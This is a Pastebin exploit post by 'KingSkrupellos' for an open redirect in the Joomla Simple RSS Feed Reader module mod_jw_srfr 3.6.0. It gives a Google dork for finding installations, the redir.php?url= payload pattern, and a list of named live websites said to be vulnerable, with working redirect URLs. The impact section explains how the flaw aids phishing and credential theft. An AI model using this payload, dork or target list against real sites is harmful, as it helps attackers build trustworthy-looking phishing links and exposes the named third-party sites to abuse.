Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###########################################################################
- # Exploit Title : Joomla Simple RSS Feed Reader mod_jw_srfr 3.6.0 Modules Open Redirect
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/01/2019
- # Vendor Homepage : joomlaworks.net
- # Software Download Links :
- joomlaworks.net/downloads/?f=mod_jw_srfr-v3.6.0_j2.5-3.x.zip
- joomlaworks.net/downloads/?f=mod_jw_srfr-v3.6.0_j2.5-3.x.zip
- # Software Information Links :
- + extensions.joomla.org/extension/simple-rss-feed-reader/
- + joomlaworks.net/extensions/free/simple-rss-feed-reader
- # Tested On : Windows and Linux
- # Category : WebApps
- # Version Information : 3.6.0
- # Exploit Risk : Medium
- # Google Dorks : inurl:"/modules/mod_jw_srfr/"
- # Vulnerability Type : CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
- ###########################################################################
- # Impact :
- *********
- * This web application called as Joomla Simple RSS Feed Reader mod_jw_srfr 3.6.0
- accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect.
- This simplifies phishing attacks.
- * An http parameter may contain a URL value and could cause the web application to redirect
- the request to the specified URL. By modifying the URL value to a malicious site, an attacker may
- successfully launch a phishing scam and steal user credentials. Because the server name in the
- modified link is identical to the original site, phishing attempts have a more trustworthy appearance.
- ###########################################################################
- # Exploit :
- ***********
- /modules/mod_jw_srfr/redir.php?url=https://[OPEN-REDIRECT-ADDRESS-HERE.gov]
- ###########################################################################
- # Example Vulnerable Sites :
- *************************
- [+] owyyk.com/modules/mod_jw_srfr/redir.php?url=http://cxsecurity.com/ =>
- [ Proof of Concept for Open Redirect ] => archive.is/rWOQy
- [+] rosemarytv.com/modules/mod_jw_srfr/redir.php?url=https://packetstormsecurity.com
- [+] lyngs.dk/modules/mod_jw_srfr/redir.php?url=http://exploit4arab.org/
- [+] coachingathleticsq.com/modules/mod_jw_srfr/redir.php?url=http://exploit4arab.org/
- [+] indonesianmma.com/modules/mod_jw_srfr/redir.php?url=http://exploit4arab.org/
- ###########################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###########################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement